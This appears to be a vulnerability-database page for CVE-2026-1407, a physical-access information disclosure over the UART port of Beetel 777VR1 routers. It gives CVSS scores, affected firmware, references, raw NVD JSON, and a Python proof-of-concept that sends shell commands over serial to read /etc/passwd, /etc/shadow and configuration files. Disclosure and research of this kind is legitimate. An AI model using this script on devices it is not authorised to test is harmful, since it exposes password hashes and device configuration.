CVE-2026-1407

Description

A security flaw has been discovered in Beetel 777VR1 up to 01.00.09/01.00.09_55. This affects an unknown part of the component UART Interface. Performing a manipulation results in information disclosure. The attack may be carried out on the physical device. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

2.0

Severity

LOW

CVSS Vector

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:beetel:777vr1_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:beetel:777vr1:-:*:*:*:*:*:*:* - NOT VULNERABLE

Beetel 777VR1 <= 01.00.09

Beetel 777VR1 <= 01.00.09_55

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-1407 PoC - Beetel 777VR1 UART Information Disclosure
# Hardware requirements: USB to TTL serial adapter, jumper wires

import serial
import time

def connect_uart(port='/dev/ttyUSB0', baudrate=115200):
    """Connect to the device UART interface"""
    try:
        ser = serial.Serial(
            port=port,
            baudrate=baudrate,
            bytesize=serial.EIGHTBITS,
            parity=serial.PARITY_NONE,
            stopbits=serial.STOPBITS_ONE,
            timeout=5
        )
        return ser
    except Exception as e:
        print(f"Connection error: {e}")
        return None

def extract_info(ser):
    """Extract sensitive information via UART"""
    commands = [
        'cat /etc/passwd',      # Read password file
        'cat /etc/shadow',      # Read shadow file
        'ifconfig',             # Network configuration
        'route -n',             # Routing table
        'cat /tmp/config.bin', # Configuration backup
        'cat /proc/mtd',        # Memory layout
        'cat /proc/version',    # System version
        'df -h',                # Filesystem info
    ]
    
    results = []
    for cmd in commands:
        ser.write((cmd + '\n').encode())
        time.sleep(1)
        response = ser.read(ser.in_waiting).decode('utf-8', errors='ignore')
        results.append(f"Command: {cmd}\n{response}")
    
    return results

# Example usage
if __name__ == '__main__':
    ser = connect_uart()
    if ser:
        print("Connected to Beetel 777VR1 UART")
        time.sleep(2)
        info = extract_info(ser)
        for item in info:
            print(item)
        ser.close()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1407
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1407
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1407/
[4] VulDB https://vuldb.com/cve/CVE-2026-1407
[5] https://gist.github.com/raghav20232023/253c041842f622d9c2cb6ee4111c2227
[6] https://vuldb.com/?ctiid.342796
[7] https://vuldb.com/?id.342796
[8] https://vuldb.com/?submit.736322

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1407", "sourceIdentifier": "[email protected]", "published": "2026-01-25T22:16:00.563", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Beetel 777VR1 up to 01.00.09/01.00.09_55. This affects an unknown part of the component UART Interface. Performing a manipulation results in information disclosure. The attack may be carried out on the physical device. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en Beetel 777VR1 hasta 01.00.09/01.00.09_55. Esto afecta una parte desconocida del componente Interfaz UART. Realizar una manipulación resulta en revelación de información. El ataque puede ser llevado a cabo en el dispositivo físico. Se considera que el ataque tiene alta complejidad. Se indica que la explotabilidad es difícil. El exploit ha sido publicado al público y puede ser usado para ataques. El proveedor fue contactado tempranamente sobre esta revelación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.3, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 1.2, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:beetel:777vr1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "01.00.09_55", "matchCriteriaId": "DDB59B43-847F-4251-9CDC-96992B3D0C0C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:beetel:777vr1:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF58180F-9493-4B69-8C29-F2FF33C73BAB"}]} ... (truncated)